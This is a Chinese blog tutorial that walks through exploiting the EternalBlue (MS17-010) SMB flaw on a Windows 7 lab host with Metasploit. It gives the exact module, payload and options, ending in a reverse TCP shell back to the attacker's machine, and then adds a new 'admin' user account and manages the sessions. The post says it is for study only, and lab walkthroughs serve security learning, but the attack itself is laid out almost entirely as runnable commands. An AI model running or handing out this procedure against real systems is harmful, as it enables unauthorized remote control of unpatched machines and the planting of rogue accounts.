使用msf渗透Win7主机并远程执行命令

于 2022-01-23 16:32:17 发布 2117 收藏 1
分类专栏: kali Linux 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44821149/article/details/122652586
版权
kali 同时被 2 个专栏收录
3 篇文章 0 订阅
订阅专栏
Linux
13 篇文章 0 订阅
订阅专栏

本文仅用于学习和研究,切勿用于非法用途,本文不承担任何法律责任

1.1 通过 msf 模块获取 Win7 主机远程 shell
1.1.1 我们先进入msf
msf5 > msfdb run
在这里插入图片描述

1.1.2我们再扫描目标是否存在 ms17-010 漏洞
msf5 > search ms17-01
在这里插入图片描述

1.1.3 我们使用 use 命令选中这个模块
msf5 > use auxiliary/scanner/smb/smb_ms17_010
然后我们查看模块需要配置的信息
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
在这里插入图片描述

1.1.4 紧接着我们配置 RHOST 主机 IP
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.10
开始扫描
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
在这里插入图片描述

1.1.5 我们接着查找攻击模块
msf5 > search ms17-010
并使用 use 命令加载模块
msf5 > use exploit/windows/smb/ms17_010_eternalblu
在这里插入图片描述

1.1.6 然后我们查看模块需要配置的信息
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
在这里插入图片描述

1.1.7 紧接着我们设置一下目标主机 IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
并查看 exploit target 目标类型:
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets
在这里插入图片描述

我们可以看到这个模块只有一个 target,所以默认就选择这个目标系统。所以我们就不需要手动设置。
1.1.8然后我们找一个 payload,获取 shell 远程连接权限后,进行远程执行命令
msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/x64/shell type:payload
在这里插入图片描述

1.1.9 然后我们设置一下payload msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/shell/reverse_tcp
在这里插入图片描述

1.1.10 我们查看一下 payloads 需要配置什么信息
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
在这里插入图片描述

1.1.11 我们设置一下本机 payload 监听地址
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.11
在这里插入图片描述

1.1.12 配置完成后我们开始执行
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
在这里插入图片描述

可以看见我们这边已经出现了目标主机也就是win7的shell
这边需要注意的一点是,如果我们出现win之后还是没有出现shell,我们回车一下就可以了

1.1.13 然后我们使用 DOS 命令创建用户
C:\Windows\system32>net user admin admin /add (注意/add前的空格)
我这边第一次漏打空格了,但是以为win编码和lin不一样,使用这边看不出来
所以我们这边要换一下编码 C:\Windows\system32>chcp 65001
在这里插入图片描述

1.1.14 然后我们再试一下,可以看到我们已经执行成功(刚才确实漏打了)
在这里插入图片描述

1.1.15 我们查看一下靶机上的用户
C:\Windows\system32>net user
在这里插入图片描述

可以看到我们新添加的用户admin

1.1.16 然后我们查看拿到的用户权限
C:\Windows\system32>whoami

在这里插入图片描述

这边去win7系统里看一下,确实多出来我们的新加的用户admin
在这里插入图片描述

1.2 通过会话进行连接目标机

1.2.1 我们先关闭链接
Ctrl+c
Abort session 1? [y/N] y
然后我们
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机
在这里插入图片描述

1.2.2 接着我们查看我们当前的会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
在这里插入图片描述

1.2.3 然后我们可以通过会话 Id 进入会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2
在这里插入图片描述

1.2.4 background退出会话将会话保存到后台
C:\Windows\system32>background

在这里插入图片描述

1.2.5然后可以根据会话id来结束会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
然后我们再查看一下会话
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions
可以看到我们的刚才id为2的会话已经结束了
在这里插入图片描述

confined.
关注
专栏目录
实战-使用msf渗透攻击win7主机远程执行命令
保持微笑的博客
01-14 769
1.什么是永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.通过msf模块获取win7主机远程shell 模块的整体使用流程如下
使用 msf 渗透攻击 win7 主机远程执行命令
枫梓林のBlog
04-21 1291
使用 msf 渗透攻击 win7 主机远程执行命令 文章目录使用 msf 渗透攻击 win7 主机远程执行命令一、扫描局域网存活的主机判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描 该网段 判断目标主机二、通过Nessus 扫描该主机漏洞三、通过msf模块获取win7主机远程shell总结 实验环境 Win7 旗舰版 SP1 -64 位 kali Linux 2019.1a Nessus 一、扫描局域网存活的主机判断是否是目标主机
参与评论 您还未登录,请先 登录 后发表或查看评论
渗透实战】通过msf模块获取win7主机远程shell
yummy11111的博客
03-25 363
渗透学习
MSF远程登录实验
坏坏-5的博客
04-13 674
本篇是关于使用MSF工具远程控制桌面实验笔记!
MSF完成对win7;xp的漏洞攻击
qq_61988806的博客
01-03 166
msf渗透win7 winxp(持续更新)
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
最新发布
weixin_45596770的博客
04-18 3440
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,设置为每次开机自动启动 msfconsole 或者 点击kali
MSF常用命令
weixin_42140534的博客
08-04 1484
0x01 msf获取shell 启动 msfconsole 搜索某个模块 search ms08-067 使用某个模块 use exploit/windows/smb/ms08-067_netapi 查看当前模块可以使用的payload[可以省略] show payloads 查看当前模块需要的参数配置 show options[可略] 选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp 设置目标的IP地址 set RHOST 192
Kali利用msf入侵Windows电脑(最详细包会)
热门推荐
RFZ_322的博客
03-09 1万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
MSF+内网穿透 实现远控
yxngu
05-09 5559
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 非实际攻击!!! 写一篇远程渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!!! 接下来开始本次教程 先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创...
使用msfvenom生成后门软件对靶机进行远程控制
qq_39120795的博客
12-06 3049
如何使用msfvenom生成后门软件对靶机进行远程控制
关于使用msf渗透攻击Win7主机远程执行命令的复习
weixin_44663190的博客
04-16 2866
关于使用msf渗透攻击Win7主机远程执行命令的复习 一、关于环境的搭建 攻击机:kali 靶机:win7 旗舰版 sp1 win版本这里最好就下载我所指出的版本,因为其他版本由于系统和补丁不同可能会出现漏洞无法利用情况 关于kali系统和win7 旗舰版sp1的安装就不多赘述,很多博文都已经讲述 1.1 打开虚拟机软件,准备开始环境 1.2 打开已经配置好的两个虚拟环境 1.3 配置...
内网渗透|后渗透远程桌面
weixin_43718688的博客
05-06 589
内网渗透|后渗透远程桌面 0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文。 0x01 隐藏用户(影子用户)的创建与利用进行权限维持 这里先提一个概念,在windows环境下创建用户如果后面带了一个 DOLLA
kali 利用msf通过win7永恒之蓝漏洞获取权限
Snakewood的博客
10-06 3705
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应该有不少错误,还请各位大佬多包含!好久没有写过博客记录自己的学习了,今天顺手也记录一下。 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索
云服务器部署msf生成windows木马远程攻击个人主机
CC__Faker的博客
07-01 550
目录0x01 环境部署0x01 纯净系统安装0x02 安装msf0x02 生成木马0x03 利用msf攻击 0x01 环境部署 我云服务器采用的是阿里云的服务器,自己重装了个纯净系统,建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用阿里云服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 0x01 纯净系统安装 1)安装软件 #Debian/Ubuntu系统: apt-get update apt-get install -y xz-utils openssl gawk fil
MSF初探: ms17-010对win7进行渗透(传说中的永恒之蓝)
梦想专栏
07-30 2223
1、https://blog.csdn.net/xiaopan233/article/details/82808386 2、 https://blog.csdn.net/qq_38240166/article/details/79476678 [rhosts 目标机 lhost 原始攻击机] remoter hosts / local host 在meterpreter 下输入s...
MSF使用教程
hackzkaq的博客
10-18 8330
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,将它们贡献给所.
Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
weixin_46035615的博客
04-14 1773
1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
Fighting_hawk的博客
03-27 5752
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
msf命令
净邪的博客
03-08 2598
基础命令概览:back(返回): 从目前的情况下向后移动banner:Display an awesome metasploit bannercd: 改变当前的工作目录color: 切换颜色connect(远程连接): 与主机通信edit(编辑): ...
kali利用MSF对ms17_010漏洞入侵win7
m0_57856283的博客
11-05 3206
步骤一:实验环境的搭建 攻击机:kali(2021.1版本)靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安装好的环境 这边是我搭建好的kali环境 下面是搭建好的win7环境 这边注意的是攻击机和受害机都要让它在同一网段 接下来我们分别来看两个主机的ip地址 这个是win7的ip地址 这个是kali的ip地址 我们可以看出两台主机实在同一个网段的,我们再来试试两台主机之间能否...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:大白 设计师:CSDN官方博客 返回首页

打赏作者

confined.

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值